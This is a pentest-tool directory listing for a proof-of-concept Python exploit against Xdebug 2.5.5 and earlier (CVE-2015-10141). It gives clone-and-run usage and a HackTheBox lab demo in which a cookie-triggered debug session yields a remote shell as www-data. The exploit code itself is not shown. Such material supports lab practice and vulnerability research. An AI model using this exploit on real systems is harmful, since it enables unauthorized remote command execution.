Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
PoC-CVE-2015-10141-Xdebug — Proof-of-Concept exploit script for Xdebug 2.5.5 and earlier versions (CVE-2015-10141). | Kitploit
Tools/GitHubGitHub/n0m4d22/poc-cve-2015-10141-xdebug
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubn0m4d22/poc-cve-2015-10141-xdebug

PoC-CVE-2015-10141-Xdebug

Proof-of-Concept exploit script for Xdebug 2.5.5 and earlier versions (CVE-2015-10141).

View Repository
21 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

PoC-CVE-2015-10141

Custom Python exploit for Xdebug ≤ 2.5.5 (CVE-2015-10141).


Description

This repository contains my Proof-of-Concept (PoC) exploit for the Xdebug remote code execution vulnerability in versions 2.5.5 and earlier.
The script leverages the unauthenticated debugging protocol exposed on port 9000 to achieve remote command execution.

  • Vulnerability: CVE-2015-10141
  • Vulnerability type: Remote Code Execution (RCE)
  • Affected software: Xdebug ≤ 2.5.5

Usage

root@kitploit:~
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py

When prompted, enter the target IP where Xdebug is hosted.

Demonstration from my recent HackTheBox Olympus (Medium) write-up :

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data

Requirements

  • Python 3.x
  • Target running Xdebug ≤ 2.5.5 with remote debugging enabled

Disclaimer

This project is created for educational purposes only.

Do NOT use this exploit against systems without explicit authorization. I am not responsible for any misuse of this code.


References

  • NVD – CVE-2015-10141
  • ExploitDB – 44568
  • Xdebug Official Site
Download Tool